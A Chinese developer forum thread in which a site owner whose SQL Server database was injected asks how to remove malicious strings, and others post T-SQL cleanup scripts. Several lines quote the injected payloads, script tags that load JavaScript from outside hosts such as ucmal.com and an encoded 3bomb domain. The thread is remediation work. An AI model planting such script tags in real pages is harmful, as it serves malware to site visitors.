-
本版专家分:0结帖率 98.78% -
看看这个语句带<>=符号怎么写?在线等待。高分求救。请求立即回复。
服务器被sqlin,需要replace表里所有字段。
update buss set 企业名称=replace(企业名称,'<script src=http://3bomb.%63%6Fm/c.js></script><script src=http://3bomb.%63%6Fm/c.js></script><script src=http://3bomb.%63%6Fm/c.js></script><script src=http://3bomb.%63%6Fm/c.js></script>','')
这样写可以
declare @s varchar(8000)
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+','<script src=http://3bomb.%63%6Fm/c.js>','')' from syscolumns where id=object_id('buss')
print @s
exec(@s)
但是这样就不行了。似乎是到<或者=就被误识别了。
提示
消息 102,级别 15,状态 1,第 2 行
'<' 附近有语法错误。
紧急求救。。。。
-
本版专家分:440973
-
- 名人 年度总版至少三次排名前十即授予名人勋章
-
- 榜眼 2008年 总版技术专家分年内排行榜第二
-
-
进士
2010年 总版技术专家分年内排行榜第四
2009年 总版技术专家分年内排行榜第五
2007年 总版技术专家分年内排行榜第六
-
-
金牌
2009年3月 总版技术专家分月排行榜第一
2008年12月 总版技术专家分月排行榜第一
2008年3月 总版技术专家分月排行榜第一
2007年12月 总版技术专家分月排行榜第一
2007年10月 总版技术专家分月排行榜第一
-
-
数据库被注入攻击 所有文本型字下段数据都被加了 <script_src=http://ucmal.com/0.js> </script>
怎么删掉?
DECLARE @fieldtype sysname
SET @fieldtype='varchar'
--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
-
本版专家分:440973
-
- 名人 年度总版至少三次排名前十即授予名人勋章
-
- 榜眼 2008年 总版技术专家分年内排行榜第二
-
-
进士
2010年 总版技术专家分年内排行榜第四
2009年 总版技术专家分年内排行榜第五
2007年 总版技术专家分年内排行榜第六
-
-
金牌
2009年3月 总版技术专家分月排行榜第一
2008年12月 总版技术专家分月排行榜第一
2008年3月 总版技术专家分月排行榜第一
2007年12月 总版技术专家分月排行榜第一
2007年10月 总版技术专家分月排行榜第一
-
-
SQL注入专题
http://topic.csdn.net/u/20081205/09/3dd06076-bcbe-45d4-998c-8999fdbe6fae.html
-
本版专家分:262854
-
- 探花 2006年 总版技术专家分年内排行榜第三
-
- 进士 2005年 总版技术专家分年内排行榜第四
-
-
金牌
2006年11月 总版技术专家分月排行榜第一
2006年3月 总版技术专家分月排行榜第一
2006年2月 总版技术专家分月排行榜第一
2006年1月 总版技术专家分月排行榜第一
2005年12月 总版技术专家分月排行榜第一
-
-
银牌
2006年5月 总版技术专家分月排行榜第二
2005年11月 总版技术专家分月排行榜第二
2005年10月 总版技术专家分月排行榜第二
2005年9月 总版技术专家分月排行榜第二
-
-
declare @s varchar(8000)
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+',''<script src=http://3bomb.%63%6Fm/c.js>'','''')' from syscolumns where id=object_id('buss')
print @s
exec(@s)
-
本版专家分:0
-
错误啊。。。
消息 16950,级别 16,状态 2,过程 sp_MSforeach_worker,第 27 行
目前没有为变量 '@local_cursor' 分配游标。
消息 16950,级别 16,状态 2,过程 sp_MSforeach_worker,第 32 行
目前没有为变量 '@local_cursor' 分配游标。
消息 16950,级别 16,状态 2,过程 sp_MSforeach_worker,第 153 行
目前没有为变量 '@local_cursor' 分配游标。
消息 16916,级别 16,状态 1,过程 sp_MSforeach_worker,第 155 行
名为 'hCForEachDatabase' 的游标不存在。
-
本版专家分:440973
-
- 名人 年度总版至少三次排名前十即授予名人勋章
-
- 榜眼 2008年 总版技术专家分年内排行榜第二
-
-
进士
2010年 总版技术专家分年内排行榜第四
2009年 总版技术专家分年内排行榜第五
2007年 总版技术专家分年内排行榜第六
-
-
金牌
2009年3月 总版技术专家分月排行榜第一
2008年12月 总版技术专家分月排行榜第一
2008年3月 总版技术专家分月排行榜第一
2007年12月 总版技术专家分月排行榜第一
2007年10月 总版技术专家分月排行榜第一
-
-
我这是2000下的代码,是测试过的,没有问题.2005不适合.
-
本版专家分:34059 -
看来流行sqlin a。
-
本版专家分:7
-
将字符串的单引号内加一双引号 '"<...=...>"'
-
本版专家分:1309 -
declare @s varchar(8000)
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+','''<script src=http://3bomb.%63%6Fm/c.js>''','')' from syscolumns where id=object_id('buss')
print @s
exec(@s)
-
本版专家分:275 -
up
-
本版专家分:0
-
还是没有完美的解决办法。。哎
朋友们继续帮帮忙吧。
我就很奇怪。所有的连接数据库的语句都通过conn conn里加了筛选 update 他怎么可能写进去呢。。
-
本版专家分:7698 -
SQL 注入---查查这方面的资料吧
参考:http://topic.csdn.net/u/20090114/22/1ff49029-695c-4251-b767-74fefc3513ad.html
-
本版专家分:7228
-
select @s=isnull(@s,'')+'update buss set '+name+'=replace('+name+',''<script src=http://3bomb.%63%6Fm/c.js>'','''')' from syscolumns where id=object_id('buss')
也可以考虑使用系统存储过程sp_executesql来实现,减少注入攻击现象。
-
本版专家分:45
-
up
-
本版专家分:0
-
估计是我自己的问题。
只处理了Request.QueryString,忘记处理Request.Form了。还是不停的被注入。